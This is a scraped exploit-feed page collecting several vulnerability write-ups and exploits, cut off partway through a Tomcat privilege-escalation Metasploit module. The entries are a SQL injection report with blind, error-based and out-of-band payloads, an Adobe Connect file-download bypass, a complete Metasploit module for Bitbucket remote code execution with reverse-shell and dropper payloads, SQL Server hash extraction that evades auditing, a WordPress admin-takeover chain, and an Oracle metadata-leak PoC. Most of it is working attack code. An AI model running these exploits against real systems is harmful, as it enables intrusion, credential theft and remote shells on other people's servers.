Latest exploits :: CodePwn

<pre><code>## Title: Yoga Class Registration -1.0-2023 - Multiple SQLi ## Author: nu11secur1ty ## Date: 02.27.2023 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `cid` parameter appears to be vulnerable to Multiple-SQL injection attacks. The payload '+(select load_file('\\\\aaob4nk5vd0lv9e50qp2c5c1dsjl7iv9yxpkg85.stupid.com\\shs'))+' was submitted in the cid parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The attacker easily can steal all information about this server and this could be awful for all users of this system. STATUS: HIGH Vulnerability - CRITICAL [+]Payload: ```mysql --- Parameter: cid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=yclasses/registration&cid=158158925' or '6060'='6060' AND 7469=7469 AND 'IrlM'='IrlM Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: p=yclasses/registration&cid=158158925' or '6060'='6060' AND (SELECT 6894 FROM(SELECT COUNT(*),CONCAT(0x71786b7071,(SELECT (ELT(6894=6894,1))),0x716a6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CykB'='CykB Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=yclasses/registration&cid=158158925' or '6060'='6060' AND (SELECT 9785 FROM (SELECT(SLEEP(3)))edGv) AND 'KLgd'='KLgd --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Yoga-Class-Registration%20-1.0-2023%20-%20Multiple-SQLi) ## Proof and Exploit: [href](https://streamable.com/hhcgg6) ## Time spend: 01:00:00 </code></pre>

<pre><code># Title: adobe connect - Local File Disclosure / Download [security feature bypass vulnerability] # Author: h4shur # date:2021.01.16-2023.02.17 # CVE: CVE-2023-22232 # Vendor Homepage: https://www.adobe.com # Software Link: https://www.adobe.com/products/adobeconnect.html # Version: 11.4.5 and earlier, 12.1.5 and earlier # User interaction: None # Tested on: Windows 10 & Google Chrome, kali linux & firefox ### Summary: Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction. ### Description : There are many web applications in the world, each of which has vulnerabilities due to developer errors, and this is a problem for all of them, and even the best of them, like the "adobe connect" program, have vulnerabilities that occur every month. They are found and fixed by the team. * What is LFD bug? LFD bug stands for Local File Disclosure / Download, which generally allows the attacker to read and download files within the server, so it can be considered a very dangerous bug in the web world and programmers must be aware of it. Be careful and maintain security against this bug * Intruder access level with LFD bug The level of access using this bug can be even increased to the level of access to the website database in such a way that the hacker reads sensitive files inside the server that contain database entry information and enters the database and by extracting the information The admin will have a high level of access * Identify vulnerable sites To search for LFD bugs, you should check the site inputs. If there is no problem with receiving ./ characters, you can do the test to read the files inside the server if they are vulnerable. Enter it and see if it is read or not, or you can use files inside the server such as / etc / passwd / .. and step by step using ../ to return to the previous path to find the passwd file * And this time the "lfd" in "adobe connect" bug: To download and exploit files, you must type the file path in the "download-url" variable and the file name and extension in the "name" variable. You can download the file by writing the file path and file name and extension. When you have written the file path, file name and extension in the site address variables, a download page from Adobe Connect will open for you, with "Save to My Computer file name]" written in the download box and a file download link at the bottom of the download box, so you can download the file. * There are values inside the url that do not allow a file other than this file to be downloaded. * Values: sco_id and tickets But if these values are cleared, you will see that reloading is possible without any obstacles At another address, you can download multiple files as a zip file. We put the address of the files in front of the variable "ffn" and if we want to add the file, we add the variable "ffn" again and put the address of the file in front of it. The "download_type" variable is also used to specify the zip extension. ### POC : https://target.com/[folder]/download?download-url=[URL]&name=[file.type] https://target.com/[folder]/download?output=output&download_type=[Suffix]&ffn=[URL]&baseContentUrl=[base file folder] ### References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22232 https://nvd.nist.gov/vuln/detail/CVE-2023-22232 https://helpx.adobe.com/security/products/connect/apsb23-05.html </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Git include Msf::Exploit::Git::SmartHttp include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Bitbucket Environment Variable RCE', 'Description' => %q{ For various versions of Bitbucket, there is an authenticated command injection vulnerability that can be exploited by injecting environment variables into a user name. This module achieves remote code execution as the `atlbitbucket` user by injecting the `GIT_EXTERNAL_DIFF` environment variable, a null character as a delimiter, and arbitrary code into a user's user name. The value (payload) of the `GIT_EXTERNAL_DIFF` environment variable will be run once the Bitbucket application is coerced into generating a diff. This module requires at least admin credentials, as admins and above only have the option to change their user name. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ry0taK', # Vulnerability Discovery 'y4er', # PoC and blog post 'Shelby Pace' # Metasploit Module ], 'References' => [ [ 'URL', 'https://y4er.com/posts/cve-2022-43781-bitbucket-server-rce/'], [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-security-advisory-2022-11-16-1180141667.html'], [ 'CVE', '2022-43781'] ], 'Platform' => [ 'win', 'unix', 'linux' ], 'Privileged' => true, 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], 'Targets' => [ [ 'Linux Command', { 'Platform' => 'unix', 'Type' => :unix_cmd, 'Arch' => [ ARCH_CMD ], 'Payload' => { 'Space' => 254 }, 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'MaxLineChars' => 254, 'Type' => :linux_dropper, 'Arch' => [ ARCH_X86, ARCH_X64 ], 'CmdStagerFlavor' => %i[wget curl], 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' } } ], [ 'Windows Dropper', { 'Platform' => 'win', 'MaxLineChars' => 254, 'Type' => :win_dropper, 'Arch' => [ ARCH_X86, ARCH_X64 ], 'CmdStagerFlavor' => [ :psh_invokewebrequest ], 'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' } } ] ], 'DisclosureDate' => '2022-11-16', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'Reliability' => [ REPEATABLE_SESSION ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ] } ) ) register_options( [ Opt::RPORT(7990), OptString.new('USERNAME', [ true, 'User name to log in with' ]), OptString.new('PASSWORD', [ true, 'Password to log in with' ]), OptString.new('TARGETURI', [ true, 'The URI of the Bitbucket instance', '/']) ] ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true ) return CheckCode::Unknown('Failed to retrieve a response from the target') unless res return CheckCode::Safe('Target does not appear to be Bitbucket') unless res.body.include?('Bitbucket') nokogiri_data = res.get_html_document footer = nokogiri_data&.at('footer') return CheckCode::Detected('Failed to retrieve version information from Bitbucket') unless footer version_info = footer.at('span')&.children&.text return CheckCode::Detected('Failed to find version information in footer section') unless version_info vers_matches = version_info.match(/v(\d+\.\d+\.\d+)/) return CheckCode::Detected('Failed to find version info in expected format') unless vers_matches && vers_matches.length > 1 version_str = vers_matches[1] vprint_status("Found version #{version_str} of Bitbucket") major, minor, revision = version_str.split('.') rev_num = revision.to_i case major when '7' case minor when '0', '1', '2', '3', '4', '5' return CheckCode::Appears when '6' return CheckCode::Appears if rev_num >= 0 && rev_num <= 18 when '7', '8', '9', '10', '11', '12', '13', '14', '15', '16' return CheckCode::Appears when '17' return CheckCode::Appears if rev_num >= 0 && rev_num <= 11 when '18', '19', '20' return CheckCode::Appears when '21' return CheckCode::Appears if rev_num >= 0 && rev_num <= 5 end when '8' print_status('Versions 8.* are vulnerable only if the mesh setting is disabled') case minor when '0' return CheckCode::Appears if rev_num >= 0 && rev_num <= 4 when '1' return CheckCode::Appears if rev_num >= 0 && rev_num <= 4 when '2' return CheckCode::Appears if rev_num >= 0 && rev_num <= 3 when '3' return CheckCode::Appears if rev_num >= 0 && rev_num <= 2 when '4' return CheckCode::Appears if rev_num == 0 || rev_num == 1 end end CheckCode::Detected end def default_branch @default_branch ||= Rex::Text.rand_text_alpha(5..9) end def uname_payload(cmd) "#{datastore['USERNAME']}\u0000GIT_EXTERNAL_DIFF=$(#{cmd})" end def log_in(username, password) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true ) fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('login') res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'), 'keep_cookies' => true, 'vars_post' => { 'j_username' => username, 'j_password' => password, '_atl_remember_me' => 'on', 'submit' => 'Log in' } ) fail_with(Failure::UnexpectedReply, 'Didn\'t retrieve a response') unless res res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'projects'), 'keep_cookies' => true ) fail_with(Failure::UnexpectedReply, 'No response from the projects page') unless res unless res.body.include?('Logged in') fail_with(Failure::UnexpectedReply, 'Failed to log in. Please check credentials') end end def create_project proj_uri = normalize_uri(target_uri.path, 'projects?create') res = send_request_cgi( 'method' => 'GET', 'uri' => proj_uri, 'keep_cookies' => true ) fail_with(Failure::UnexpectedReply, 'Unable to access project creation page') unless res&.body&.include?('Create project') vprint_status('Retrieving security token') html_doc = res.get_html_document token_data = html_doc.at('div//input[@name="atl_token"]') fail_with(Failure::UnexpectedReply, 'Failed to find element containing \'atl_token\'') unless token_data @token = token_data['value'] fail_with(Failure::UnexpectedReply, 'No token found') if @token.blank? project_name = Rex::Text.rand_text_alpha(5..9) project_key = Rex::Text.rand_text_alpha(5..9).upcase res = send_request_cgi( 'method' => 'POST', 'uri' => proj_uri, 'keep_cookies' => true, 'vars_post' => { 'name' => project_name, 'key' => project_key, 'submit' => 'Create project', 'atl_token' => @token } ) fail_with(Failure::UnexpectedReply, 'Failed to receive response from project creation') unless res fail_with(Failure::UnexpectedReply, 'Failed to create project') unless res['Location']&.include?(project_key) print_status('Project creation was successful') [ project_name, project_key ] end def create_repository repo_uri = normalize_uri(target_uri.path, 'projects', @project_key, 'repos?create') res = send_request_cgi( 'method' => 'GET', 'uri' => repo_uri, 'keep_cookies' => true ) fail_with(Failure::UnexpectedReply, 'Failed to access repo creation page') unless res html_doc = res.get_html_document dropdown_data = html_doc.at('li[@class="user-dropdown"]') fail_with(Failure::UnexpectedReply, 'Failed to find dropdown to retrieve email address') if dropdown_data.blank? email = dropdown_data&.at('span')&.[]('data-emailaddress') fail_with(Failure::UnexpectedReply, 'Failed to retrieve email address from response') if email.blank? repo_name = Rex::Text.rand_text_alpha(5..9) res = send_request_cgi( 'method' => 'POST', 'uri' => repo_uri, 'keep_cookies' => true, 'vars_post' => { 'name' => repo_name, 'defaultBranchId' => default_branch, 'description' => '', 'scmId' => 'git', 'forkable' => 'false', 'atl_token' => @token, 'submit' => 'Create repository' } ) fail_with(Failure::UnexpectedReply, 'No response received from repo creation') unless res res = send_request_cgi( 'method' => 'GET', 'keep_cookies' => true, 'uri' => normalize_uri(target_uri.path, 'projects', @project_key, 'repos', repo_name, 'browse') ) fail_with(Failure::UnexpectedReply, 'Repository was not created') if res&.code == 404 print_good("Successfully created repository '#{repo_name}'") [ email, repo_name ] end def generate_repo_objects(email, repo_file_data = [], parent_object = nil) txt_data = Rex::Text.rand_text_alpha(5..20) blob_object = GitObject.build_blob_object(txt_data) file_name = "#{Rex::Text.rand_text_alpha(4..10)}.txt" file_data = { mode: '100755', file_name: file_name, sha1: blob_object.sha1 } tree_data = (repo_file_data.empty? ? [ file_data ] : [ file_data, repo_file_data ]) tree_obj = GitObject.build_tree_object(tree_data) commit_obj = GitObject.build_commit_object({ tree_sha1: tree_obj.sha1, email: email, message: Rex::Text.rand_text_alpha(4..30), parent_sha1: (parent_object.nil? ? nil : parent_object.sha1) }) { objects: [ commit_obj, tree_obj, blob_object ], file_data: file_data } end # create two files in two separate commits in order # to view a diff and get code execution def create_commits(email) init_objects = generate_repo_objects(email) commit_obj = init_objects[:objects].first refs = { 'HEAD' => "refs/heads/#{default_branch}", "refs/heads/#{default_branch}" => commit_obj.sha1 } final_objects = generate_repo_objects(email, init_objects[:file_data], commit_obj) repo_objects = final_objects[:objects] + init_objects[:objects] new_commit = final_objects[:objects].first new_file = final_objects[:file_data][:file_name] git_uri = normalize_uri(target_uri.path, "scm/#{@project_key}/#{@repo_name}.git") res = send_receive_pack_request( git_uri, refs['HEAD'], repo_objects, '0' * 40 # no commits should exist yet, so no branch tip in repo yet ) fail_with(Failure::UnexpectedReply, 'Failed to push commit to repository') unless res fail_with(Failure::UnexpectedReply, 'Git responded with an error') if res.body.include?('error:') fail_with(Failure::UnexpectedReply, 'Git push failed') unless res.body.include?('unpack ok') [ new_commit.sha1, commit_obj.sha1, new_file ] end def get_user_id(curr_uname) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'admin/users/view'), 'vars_get' => { 'name' => curr_uname } ) matched_id = res.get_html_document&.xpath("//script[contains(text(), '\"name\":\"#{curr_uname}\"')]")&.first&.text&.match(/"id":(\d+)/) fail_with(Failure::UnexpectedReply, 'No matches found for id of user') unless matched_id && matched_id.length > 1 matched_id[1] end def change_username(curr_uname, new_uname) @user_id ||= get_user_id(curr_uname) headers = { 'X-Requested-With' => 'XMLHttpRequest', 'X-AUSERID' => @user_id, 'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}" } vars = { 'name' => curr_uname, 'newName' => new_uname }.to_json res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'rest/api/latest/admin/users/rename'), 'ctype' => 'application/json', 'keep_cookies' => true, 'headers' => headers, 'data' => vars ) unless res print_bad('Did not receive a response to the user name change request') return false end unless res.body.include?(new_uname) || res.body.include?('GIT_EXTERNAL_DIFF') print_bad('User name change was unsuccessful') return false end true end def commit_uri(project_key, repo_name, commit_sha) normalize_uri( target_uri.path, 'rest/api/latest/projects', project_key, 'repos', repo_name, 'commits', commit_sha ) end def view_commit_diff(latest_commit_sha, first_commit_sha, diff_file) commit_diff_uri = normalize_uri( commit_uri(@project_key, @repo_name, latest_commit_sha), 'diff', diff_file ) send_request_cgi( 'method' => 'GET', 'uri' => commit_diff_uri, 'keep_cookies' => true, 'vars_get' => { 'since' => first_commit_sha } ) end def delete_repository(username) vprint_status("Attempting to delete repository '#{@repo_name}'") repo_uri = normalize_uri(target_uri.path, 'projects', @project_key, 'repos', @repo_name.downcase) res = send_request_cgi( 'method' => 'DELETE', 'uri' => repo_uri, 'keep_cookies' => true, 'headers' => { 'X-AUSERNAME' => username, 'X-AUSERID' => @user_id, 'X-Requested-With' => 'XMLHttpRequest', 'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}", 'ctype' => 'application/json', 'Accept' => 'application/json, text/javascript' } ) unless res&.body&.include?('scheduled for deletion') print_warning('Failed to delete repository') return end print_good('Repository has been deleted') end def delete_project(username) vprint_status("Now attempting to delete project '#{@project_name}'") send_request_cgi( # fails to return a response 'method' => 'DELETE', 'uri' => normalize_uri(target_uri.path, 'projects', @project_key), 'keep_cookies' => true, 'headers' => { 'X-AUSERNAME' => username, 'X-AUSERID' => @user_id, 'X-Requested-With' => 'XMLHttpRequest', 'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}", 'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/projects/#{@project_key}/settings", 'ctype' => 'application/json', 'Accept' => 'application/json, text/javascript, */*; q=0.01', 'Accept-Encoding' => 'gzip, deflate' } ) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'projects', @project_key), 'keep_cookies' => true ) unless res&.code == 404 print_warning('Failed to delete project') return end print_good('Project has been deleted') end def get_repo res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'), 'keep_cookies' => true ) unless res print_status('Couldn\'t access repos page. Will create repo') return [] end json_data = JSON.parse(res.body) unless json_data && json_data['size'] >= 1 print_status('No accessible repositories. Will attempt to create a repo') return [] end repo_data = json_data['values'].first repo_name = repo_data['slug'] project_key = repo_data['project']['key'] unless repo_name && project_key print_status('Could not find repo name and key. Creating repo') return [] end [ repo_name, project_key ] end def get_repo_info unless @project_name && @project_key print_status('Failed to find valid project information. Will attempt to create repo') return nil end res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri('projects', @project_key, 'repos', @project_name, 'commits'), 'keep_cookies' => true ) unless res print_status("Failed to access existing repository #{@project_name}") return nil end html_doc = res.get_html_document commit_data = html_doc.search('a[@class="commitid"]') unless commit_data && commit_data.length > 1 print_status('No commits found for existing repo') return nil end latest_commit = commit_data[0]['data-commitid'] prev_commit = commit_data[1]['data-commitid'] file_uri = normalize_uri(commit_uri(@project_key, @project_name, latest_commit), 'changes') res = send_request_cgi( 'method' => 'GET', 'uri' => file_uri, 'keep_cookies' => true ) return nil unless res json = JSON.parse(res.body) return nil unless json['values'] path = json['values']&.first&.dig('path') return nil unless path [ latest_commit, prev_commit, path['name'] ] end def exploit @use_public_repo = true datastore['GIT_USERNAME'] = datastore['USERNAME'] datastore['GIT_PASSWORD'] = datastore['PASSWORD'] if datastore['USERNAME'].blank? && datastore['PASSWORD'].blank? fail_with(Failure::BadConfig, 'No credentials to log in with.') end log_in(datastore['USERNAME'], datastore['PASSWORD']) @curr_uname = datastore['USERNAME'] @project_name, @project_key = get_repo @repo_name = @project_name @latest_commit, @first_commit, @diff_file = get_repo_info unless @latest_commit && @first_commit && @diff_file @use_public_repo = false @project_name, @project_key = create_project email, @repo_name = create_repository @latest_commit, @first_commit, @diff_file = create_commits(email) print_good("Commits added: #{@first_commit}, #{@latest_commit}") end print_status('Sending payload') case target['Type'] when :win_dropper execute_cmdstager(linemax: target['MaxLineChars'] - uname_payload('cmd.exe /c ').length, noconcat: true, temp: '.') when :linux_dropper execute_cmdstager(linemax: target['MaxLineChars'], noconcat: true) when :unix_cmd execute_command(payload.encoded.strip) end end def cleanup if @curr_uname != datastore['USERNAME'] print_status("Changing user name back to '#{datastore['USERNAME']}'") if change_username(@curr_uname, datastore['USERNAME']) @curr_uname = datastore['USERNAME'] else print_warning('User name is still set to payload.' \ "Please manually change the user name back to #{datastore['USERNAME']}") end end unless @use_public_repo delete_repository(@curr_uname) if @repo_name delete_project(@curr_uname) if @project_name end end def execute_command(cmd, _opts = {}) if target['Platform'] == 'win' curr_payload = (cmd.ends_with?('.exe') ? uname_payload("cmd.exe /c #{cmd}") : uname_payload(cmd)) else curr_payload = uname_payload(cmd) end unless change_username(@curr_uname, curr_payload) fail_with(Failure::UnexpectedReply, 'Failed to change user name to payload') end view_commit_diff(@latest_commit, @first_commit, @diff_file) @curr_uname = curr_payload end end </code></pre>

<pre><code>Title: Microsoft SQL Server Password Hash Exposure Product: Database Manufacturer: Microsoft Affected Version(s): 2012-2022 Risk Level: Medium CVE Reference: N/A Author of Advisory: Emad Al-Mousa Overview: SQL Server is a popular database system, and database systems are a vital backbone in IT infrastructure as different types of systems and applications will require back-end data-store (databsae system). Moreover, Password hashes for Local database accounts are restricted in terms of permission access and only system admins/ DBA's can access them. of course, attackers will attempt to access them to crack the hashes and access the database system for data exfiltration. ***************************************** Vulnerability Details: The following exploit assumes attacker escalated his permission as admin, and he/she will be able extract the password hashes even though an audit is in-place. So, its an audit by pass vulnerability. currently, SQL Server password hashes are stored in two tables: sys.sql_logins ----> visible table and auditing can be configured against it sys.sysxlgns -----> invisible table and requires special access mode and audit rule is not functional ! ***************************************** Proof of Concept (PoC): I will simulate a way to extract password hashes in a stealthy way (auditing will not capture it), in the following PoC the account is called dodo: Accessing windows server as administrator, open CMD session using the following command: sqlcmd -S localhost\MSSQL2019 -A -E USE [master] GO select name,pwdhash from sys.sysxlgns where name='dodo'; GO The password hashes for account “dodo” will be displayed. Let us create an audit rule using this method to capture “select” statements executed against sys.sysxlgns : I will create a server-level audit to push audit logs as “binary file”: USE [master] GO CREATE SERVER AUDIT [Audit-2020-SYSTEM-TABLE] TO FILE ( FILEPATH = N’D:\mssq_audit\’ ,MAXSIZE = 0 MB ,MAX_ROLLOVER_FILES = 2147483647 ,RESERVE_DISK_SPACE = OFF ) WITH ( QUEUE_DELAY = 1000 ,ON_FAILURE = CONTINUE ,AUDIT_GUID = ‘0333dfad-260b-45a4-8302-d7eb94c14cdc’ ) ALTER SERVER AUDIT [Audit-2020-SYSTEM-TABLE] WITH (STATE = ON) GO Then, I will define a database level audit under “MASTER” database to audit SELECT statement by any user/account against the system table sys.sysxlgns as follows: sqlcmd -S localhost\MSSQL2019 -A -E USE [master] GO CREATE DATABASE AUDIT SPECIFICATION [audit-systemtable] FOR SERVER AUDIT [Audit-2020-SYSTEM-TABLE] ADD (SELECT ON OBJECT::[sys].[sysxlgns] BY [public]) WITH (STATE = ON) GO The audit specification will be successfully created and can be visibly seen in SQL Server management studio. Now you attempt to execute select statement again: sqlcmd -S localhost\MSSQL2019 -A -E USE [master] GO select name,pwdhash from sys.sysxlgns where name='dodo'; GO - checking audit logs.....nothing is recorded ! Conclustion: Super users and admin accounts must be monitored/audited for real-time monitoring for threat detection, and for future forensic analysis ! ***************************************** - Defensive Techniques: configure Operating System Security auditing and Monitoring. Network Segmentation and Firewall. pro-actively patch your systems and database systems. ***************************************** References: https://databasesecurityninja.wordpress.com/2020/06/02/extract-sql-server-database-password-hashes-without-a-trace/ https://learn.microsoft.com/en-us/sql/relational-databases/system-tables/system-base-tables?view=sql-server-ver16 </code></pre>

<pre><code>Description: Profile Builder – User Profile & User Registration Forms <= 3.9.0 – Sensitive Information Disclosure via Shortcode Affected Plugin: Profile Builder – User Profile & User Registration Forms Plugin Slug: profile-builder Affected Versions: <= 3.9.0 CVE ID: CVE-2023-0814 CVSS Score: 6.4 (Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N Researcher/s: Lana Codes Fully Patched Version: 3.9.1 Vulnerability Analysis The vulnerability, assigned CVE-2023-0814, exists due to missing authorization within the wppb_toolbox_usermeta_handler() function. The affected function is defined as a callback function to the ‘user_meta’ shortcode, which is registered via the WordPress add_shortcode() function in usermeta.php. As with all shortcode callback functions, wppb_toolbox_usermeta_handler() takes an array of attributes. In particular, the ‘user_id’ attribute is used to create a new user object. Then, the ‘key’ attribute is used in a call to ‘$user->get()’. Finally, the function returns the value of the retrieved ‘key’ for the given ‘user_id’. During this process, capability checks are not properly implemented to ensure that the user executing the function is authorized to retrieve the given ‘key’ value. Profile Builder wppb_toolbox_usermeta_handler function The wppb_toolbox_usermeta_handler() function creates a user object and performs a $user->get() with threat actor-supplied values. Prerequisites Vulnerable instances of Profile Builder need the ‘Enable Usermeta shortcode’ setting enabled within the ‘Shortcodes’ section of the ‘Advanced Settings’ tab of the plugin’s ‘Settings’ page. Profile Builder Advanced Settings Page ‘Enable Usermeta shortcode’ setting activated Exploitation Information Disclosure Any authenticated user, with subscriber-level permissions or greater, can send a specially-crafted HTTP POST request to the ‘wp-admin/admin-ajax.php’ endpoint with the ‘action’ parameter set to ‘parse-media-shortcode’ and the ‘shortcode’ parameter containing the ‘user_meta’ shortcode with the ‘user_id’ and ‘key’ attributes set. Profile Builder POST to admin-ajax.php to retrieve the username of the user with a user ID of 1 POST to admin-ajax.php to retrieve the username of the user with a user ID of 1 As explained earlier, the value of the ‘key’ attribute is passed to a $user->get() call. Since the get() method of the WP_User class is designed to retrieve user information, any column of the ‘wp_users’ table can be passed via this attribute, including: - ID - user_login - user_pass - user_nicename - user_email - user_url - user_registered - user_activation_key - user_status - display_name Password Reset to Privilege Escalation The Profile Builder plugin provides the shortcode ‘[wppb-recover-password]’ to embed a password recovery form into a page on a WordPress site. The form allows users to submit their username or email address to receive an email with a password reset link containing a user activation key. When generated, this key is stored in the ‘user_activation_key’ column in the ‘wp_users’ table of the WordPress database. Using CVE-2023-0814, this key can be retrieved for any user. First, the threat actor must generate the user activation key by entering the username or email address of the targeted user in the password recovery form and clicking the ‘Get New Password’ button. Profile Builder password recovery form Next, the threat actor will make a similar POST request to our previous user enumeration proof-of-concept, but this time ensuring the ‘user_id’ is set to the user ID of the username or email address entered into the password recovery form and setting the ‘key’ attribute to ‘user_activation_key’. POST to admin-ajax.php to retrieve the user activation key for the admin account Once the threat actor has retrieved the user activation key, they can navigate back to the password recovery form page, but this time with the ‘key’ query parameter set to the retrieved user activation key. Password Recovery page with ‘key’ query parameter set to retrieved value At this point, the threat actor simply needs to enter a new password and click the ‘Reset Password’ button. The threat actor will then be able to login using the targeted username and new password. Timeline February 7th, 2023 – Lana Codes responsibly discloses the vulnerability to the plugin vendor and our Vulnerability Disclosure program. February 13th, 2023 – The vendor releases a patch in version 3.9.1 and Wordfence releases a firewall rule to address the vulnerability. Wordfence Premium, Care, and Response users receive this rule. February 14th, 2023 – Wordfence releases an additional firewall rule to provide extended protection against exploitation. Wordfence Premium, Care, and Response users receive this rule. March 14th, 2023 – Wordfence free users receive the first firewall rule. March 15th, 2023 – Wordfence free users receive the second firewall rule. Conclusion In today’s post, we covered an Information Disclosure vulnerability that could lead to the takeover of an administrative account in Cozmolabs Profile Builder, a plugin used by over 60,000 WordPress installations. The Wordfence Threat Intelligence team issued a firewall rule providing protection against the vulnerability on February 13th and 14th, 2023. This rule has been protecting our Wordfence Premium, Wordfence Care, and Wordfence Response users since that date, while those still using our free version will receive this rule on March 14 and March 15, 2023. If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance. If you have any friends or colleagues who are using this plugin, please share this announcement with them and encourage them to update to the latest patched version of Profile Builder as soon as possible. If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard . </code></pre>

<pre><code>Title: CVE-2021-2173 – PDB Isolation is broken through metadata exposure Product: Database Manufacturer: Oracle Affected Version(s): 12.1.0.2, 12.2.0.1, 18c, 19c Tested Version(s): 19c Risk Level: Medium Solution Status: Fixed CVE Reference: CVE-2021-2173 Author of Advisory: Emad Al-Mousa Overview: Oracle CDB Architecture was introduced in Oracle starting from 12cR1 as a shift in their architecture to adopt Multitenancy approach for Cloud infrastructure deployment. As any other new architecture, security issues/vulnerabilities can take place. In this vulnerability I am going to show that from PDB level with account granted DBA role I can extract metadata information of other pluggable databases within the same container. ***************************************** Vulnerability Details: attacker in a pluggable database can exfiltrate metdata info. for other co-existing databases within the same container. ***************************************** Proof of Concept (PoC): I will create account called “ironman” in PDB1: sqlplus / as sysdba SQL> alter session set container=PDB1; SQL> create user ironman identified by ironman_2021; SQL> grant create session to ironman; SQL> grant dba to ironman; SQL> alter user ironman default role all; SQL> exit; Then, I will connect using ironman to PDB1 and execute the following: // dumping controlfile contents SQL> alter session set events 'immediate trace name controlf level 4'; SQL> select * from v$diag_info where NAME='Default Trace File'; SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ORCLCDB_ora_7387.trc'; After Inspecting the output, for example we can now know the location of SYSTEM data file for PDB2 database within the same container in addition to other information. So, from PDB1 the attacker will be able to view the metadata information of other customer’s PDB’s within the same container, this should not be happening in the first place as ISOLATION should be enforced ! ***************************************** References: https://www.oracle.com/security-alerts/cpuapr2021.html https://nvd.nist.gov/vuln/detail/CVE-2021-2173 https://databasesecurityninja.wordpress.com/2021/06/04/cve-2021-2173-pdb-isolation-is-broken-through-metadata-exposure/ </code></pre>

<pre><code>### # # This exploit sample shows how an exploit module could be written to exploit # a bug in a command on a linux computer for priv esc. # ### class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking include Msf::Exploit::Retry include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Post::Linux::Compile prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Apache Tomcat on RedHat Based Systems Insecure Temp Config Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability in RedHat based systems where improper file permissions are applied to /usr/lib/tmpfiles.d/tomcat.conf for Apache Tomcat versions before 7.0.54-8. This may also work against The configuration files in tmpfiles.d are used by systemd-tmpfiles to manage temporary files including their creation. With this weak permission, we're able to inject commands into systemd-tmpfiles service to write a cron job to execute our payload. systemd-tmpfiles is executed by default on boot on RedHat-based systems through systemd-tmpfiles-setup.service. Depending on the system in use, the execution of systemd-tmpfiles could also be triggered by other services, cronjobs, startup scripts etc. This module was tested against Tomcat 7.0.54-3 on Fedora 21. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Dawid Golunski <dawid@legalhackers.com>' # original PoC, analysis, discovery ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'DefaultOptions' => { 'WfsDelay' => 1800, # 30min 'payload' => 'linux/x64/meterpreter_reverse_tcp' }, 'References' => [ ['EDB', '40488' ], ['URL', 'https://access.redhat.com/security/cve/CVE-2016-5425'], ['URL', 